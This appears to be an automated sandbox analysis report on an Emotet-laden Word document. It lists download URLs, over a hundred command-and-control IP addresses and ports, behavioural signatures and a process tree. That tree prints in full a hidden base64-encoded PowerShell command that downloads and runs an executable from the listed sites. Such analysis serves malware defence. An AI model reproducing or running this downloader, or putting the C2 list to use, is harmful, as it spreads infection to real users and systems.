Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
16-01-2020 03:25
General
Malware Config
Extracted
http://iihttanzania.com/wp-admin/N8CWI/
http://fdhk.net/plugins/8xshhk/
http://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/
http://realizaweb.site/cgi-bin/AbeNM155769/
http://rochun.org/error/7WJ1/
Extracted
emotet
73.239.11.159:80
82.152.149.79:80
83.35.213.87:7080
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
94.200.126.42:80
190.186.164.23:80
68.187.160.28:443
185.86.148.222:8080
177.242.21.126:80
203.25.159.3:8080
46.101.212.195:8080
189.26.118.194:80
110.142.161.90:443
45.8.136.201:80
97.120.32.227:80
181.129.96.162:990
5.196.35.138:7080
68.183.190.199:8080
200.58.83.179:80
81.16.1.45:80
91.117.159.233:80
207.154.204.40:8080
37.120.185.153:443
181.30.61.163:80
89.32.150.160:8080
113.190.254.245:80
188.135.15.49:80
177.103.159.44:80
181.30.61.163:443
68.174.15.223:80
110.170.65.146:80
202.62.39.111:80
99.252.27.6:80
200.82.170.231:80
14.201.35.38:80
139.162.118.88:8080
190.17.44.48:80
178.79.163.131:8080
175.114.178.83:443
181.10.204.106:80
82.8.232.51:80
76.69.26.71:80
190.219.149.236:80
86.42.166.147:80
62.75.143.100:7080
87.106.77.40:7080
113.61.76.239:80
181.231.220.232:80
188.218.104.226:80
187.54.225.76:80
81.213.78.151:443
189.19.81.181:443
149.62.173.247:8080
201.213.32.59:80
2.42.173.240:80
94.176.234.118:443
190.210.184.138:995
192.241.146.84:8080
5.88.27.67:8080
151.231.7.154:80
185.94.252.12:80
203.130.0.69:80
86.123.138.76:80
188.216.24.204:80
172.104.169.32:8080
68.183.170.114:8080
144.139.56.105:80
204.225.249.100:7080
200.123.183.137:443
190.210.236.139:80
109.169.86.13:8080
93.144.226.57:80
46.28.111.142:7080
59.120.5.154:80
186.177.165.196:443
217.199.160.224:8080
94.200.114.162:80
186.68.48.204:443
91.83.93.124:7080
118.36.70.245:80
152.231.89.226:80
216.251.83.79:80
190.151.5.130:443
114.109.179.60:80
186.200.205.170:80
62.15.36.103:443
142.93.114.137:8080
79.7.158.208:80
79.7.114.1:80
87.106.46.107:8080
70.184.69.146:80
186.15.83.52:8080
2.47.112.72:80
181.167.96.215:80
104.131.58.132:8080
58.171.38.26:80
185.160.212.3:80
191.103.76.34:443
190.191.82.216:80
179.208.84.218:8080
82.196.15.205:8080
80.11.158.65:8080
83.165.78.227:80
200.55.53.7:80
190.100.153.162:443
200.45.187.90:80
138.68.106.4:7080
185.160.229.26:80
201.213.100.141:8080
191.183.21.190:80
190.195.129.227:8090
151.80.142.33:80
96.61.113.203:80
212.71.237.140:8080
37.187.6.63:8080
125.99.61.162:7080
187.188.166.192:8080
119.59.124.163:8080
45.73.157.243:8080
165.228.195.93:80
129.205.201.163:80
62.75.160.178:8080
120.150.247.164:80
181.29.101.13:8080
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3020 Powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4932 WINWORD.EXE 4716 933.exe 4388 933.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3020 328 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3020 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3020 wrote to memory of 4716 3020 Powershell.exe 80 PID 4716 wrote to memory of 4388 4716 933.exe 81 -
Executes dropped EXE 2 IoCs
pid Process 4716 933.exe 4388 933.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4388 933.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4932 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\881b837b4f8b743627ade4703cf5e6fb97eeb788212f253c65db3ed2d097375f.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAG8AbgBiAGUAaABvAG0AaQB3AHQAPQAnAFIAcABzAGoAZgB6AHoAYwBlAGUAJwA7ACQASgBxAGkAcQByAGQAeQB3AGUAcgBlAGoAdgAgAD0AIAAnADkAMwAzACcAOwAkAFYAcAByAHkAagBhAHUAdwBlAHoAdgBnAD0AJwBWAGUAegB0AHkAdwBuAGUAcAB6AHYAJwA7ACQAUwB1AGkAZAB0AHYAYwBrAG4AbwBpAGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEoAcQBpAHEAcgBkAHkAdwBlAHIAZQBqAHYAKwAnAC4AZQB4AGUAJwA7ACQASQBtAGUAawBvAGkAbABtAHkAdgBrAG0AcwA9ACcATQBxAHcAZABqAGsAZAB5AGYAawBhACcAOwAkAEIAaQBzAHcAcQBxAHEAaAB3AGoAZAB5AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAGUATgB0ADsAJABJAHYAbQBxAHAAaQB2AGYAPQAnAGgAdAB0AHAAOgAvAC8AaQBpAGgAdAB0AGEAbgB6AGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAE4AOABDAFcASQAvACoAaAB0AHQAcAA6AC8ALwBmAGQAaABrAC4AbgBlAHQALwBwAGwAdQBnAGkAbgBzAC8AOAB4AHMAaABoAGsALwAqAGgAdAB0AHAAOgAvAC8AcABtAHYAcgBhAGUAdABzAGUAbAAuAG4AZQB3AHMAbwBmAHQAZABlAG0AbwAuAGkAbgBmAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBwAHkAVQBsADUANwAzAC8AKgBoAHQAdABwADoALwAvAHIAZQBhAGwAaQB6AGEAdwBlAGIALgBzAGkAdABlAC8AYwBnAGkALQBiAGkAbgAvAEEAYgBlAE4ATQAxADUANQA3ADYAOQAvACoAaAB0AHQAcAA6AC8ALwByAG8AYwBoAHUAbgAuAG8AcgBnAC8AZQByAHIAbwByAC8ANwBXAEoAMQAvACcALgAiAFMAUABsAGAAaQBUACIAKAAnACoAJwApADsAJABRAGEAcwBkAGcAZQBtAGsAYQA9ACcAWQBrAGMAeABpAHAAZwBmAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFIAZwB2AGoAdABuAHUAcAAgAGkAbgAgACQASQB2AG0AcQBwAGkAdgBmACkAewB0AHIAeQB7ACQAQgBpAHMAdwBxAHEAcQBoAHcAagBkAHkALgAiAGQAbwB3AE4ATABPAGAAQQBgAGQARgBJAGAATABFACIAKAAkAFIAZwB2AGoAdABuAHUAcAAsACAAJABTAHUAaQBkAHQAdgBjAGsAbgBvAGkAaAApADsAJABZAGMAcwB0AGwAZQBvAHoAegBvAGwAZgA9ACcARABoAGcAbwB6AGQAbQBiAHAAZQB5AGkAZwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFMAdQBpAGQAdAB2AGMAawBuAG8AaQBoACkALgAiAGwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMwAyADAAMQA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABBAGAAUgBUACIAKAAkAFMAdQBpAGQAdAB2AGMAawBuAG8AaQBoACkAOwAkAFUAbABnAHkAYgBwAGsAbQB0AD0AJwBCAHAAcgBtAGYAZwB5AGUAaABhAHIAbQB2ACcAOwBiAHIAZQBhAGsAOwAkAE0AbgB2AGMAeQB5AGkAdQB1AGEAeQB3AHgAPQAnAFQAdQByAGgAawBsAHgAcgBzAGMAaABrAGkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBrAHMAZABjAHcAcgByAD0AJwBTAHUAeABtAGcAagBiAHEAawBnAHcAdQBvACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\933.exe"C:\Users\Admin\933.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4716 -
C:\Users\Admin\933.exe--ae32f2d73⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4388
-
-